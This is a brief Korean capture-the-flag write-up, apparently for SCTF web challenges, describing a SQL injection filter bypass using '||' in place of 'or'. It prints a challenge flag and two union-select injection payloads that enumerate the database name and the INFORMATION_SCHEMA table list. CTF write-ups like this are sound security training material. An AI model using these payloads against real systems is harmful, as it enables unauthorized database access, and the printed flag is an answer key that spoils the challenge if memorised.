Samsung Security Tech Forum
아무 값이나 입력하니 쿼리를 반환해 줬다.
sql injection이 되는지 확인해 보기 위해 값을 입력해보니깐 or을 사용하지 말라고해서 ||로 푸니 풀렸다.
SCTF{th3_f1rs7_5t3p_t0_the_w3B_h4ckEr}
2번
adasdf' union select 1,DATABASE(),3,4,5,6,7,8;#
adasdf' union select 1,TABLE_NAME,TABLE_SCHEMA,4,5,6,7,8 from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqli102';#
